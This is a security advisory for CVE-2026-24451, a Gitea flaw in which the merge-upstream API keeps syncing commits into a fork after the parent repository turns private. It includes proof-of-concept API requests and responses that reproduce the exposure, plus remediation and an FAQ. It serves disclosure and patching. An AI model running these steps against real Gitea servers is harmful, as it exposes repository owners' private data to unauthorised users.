CVE-2026-24451: Gitea fork synchronization can expose private parent repository data
Summary
The POST /api/v1/repos/{owner}/{repo}/merge-upstream endpoint continues to synchronize commits from a parent repository after the parent repository has been changed from public to private.
A fork created while the parent repository was public can still receive commits made after the parent repository becomes private. As a result, content added during the private period becomes available through the fork repository after synchronization.
Details
Gitea provides the merge-upstream API to synchronize a fork with its parent repository.
A typical workflow is:
1. A repository is public. 2. Another user creates a fork. 3. The fork owner uses merge-upstream to receive updates from the parent repository.
However, if the parent repository is later changed from public to private, the synchronization endpoint continues to import new commits from the parent repository into the fork.
In testing on Gitea 1.26.2, a fork owner who can no longer directly access the parent repository is still able to synchronize newly created commits from the parent repository into the fork by calling merge-upstream.
As a result, commits created after the visibility change can be propagated into the fork through the normal fork synchronization workflow.
PoC
Proof-of-Concept Code
https://anonymous.4open.science/r/GiteaPoC-EC93/4pocmergeupstream
PoC Details
1. User alice creates a public repository alice/P. 2. User bob forks the repository, creating bob/P. 3. alice changes alice/P from public to private. 4. Verify that bob can no longer directly access the parent repository:
http GET /api/v1/repos/alice/P
Response:
http 404 Not Found
http GET /api/v1/repos/alice/P/contents/README.md
Response:
http 404 Not Found
5. While the repository is private, alice commits a new file:
text secret.txt
6. Verify that bob cannot directly access the new file from the parent repository:
http GET /api/v1/repos/alice/P/contents/secret.txt
Response:
http 404 Not Found
7. bob synchronizes the fork:
http POST /api/v1/repos/bob/P/merge-upstream
Response:
http 200 OK
8. The newly added file is now available through the fork repository:
http GET /api/v1/repos/bob/P/contents/secret.txt
Response:
http 200 OK
The attached PoC reproduces the behavior end-to-end.
As a control test, attempting to access the private-period commit directly through the fork's Git API before synchronization fails:
http GET /api/v1/repos/bob/P/git/commits/<private-period-commit-sha>
Response:
http 404 Not Found
This indicates that the commit becomes available in the fork only after the merge-upstream operation synchronizes it from the parent repository.
Impact
A fork created while a repository is public can continue receiving updates from the parent repository after the parent repository is changed to private.
Consequently, content committed after the visibility change may become available through fork synchronization even when the fork owner can no longer directly access the parent repository.
The impact is limited to content that is synchronized from the parent repository into the affected fork. The issue does not allow modification of the parent repository or access to repositories that were never forked.
Other sources
Gitea 1.26.2 allows fork synchronization to continue after a parent repository changes from public to private, exposing data to a fork that should no longer be authorized.
— MITRE
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
go/code.gitea.io/giteato a version that resolves this vulnerability.Fixed in 1.26.3
Event History
Frequently Asked Questions
What is the severity of CVE-2026-24451?
CVE-2026-24451 has a risk score of 57, indicating a medium level of severity.
How do I fix CVE-2026-24451?
To remediate CVE-2026-24451, upgrade to Gitea version 1.26.3 or later where the issue has been addressed.
What kind of data exposure does CVE-2026-24451 cause?
CVE-2026-24451 can expose private parent repository data to unauthorized forks.
Which version of Gitea is affected by CVE-2026-24451?
Gitea versions prior to 1.26.3 are affected by CVE-2026-24451.
What is the root cause of CVE-2026-24451?
The root cause of CVE-2026-24451 is the continuation of fork synchronization after the parent repository has changed from public to private.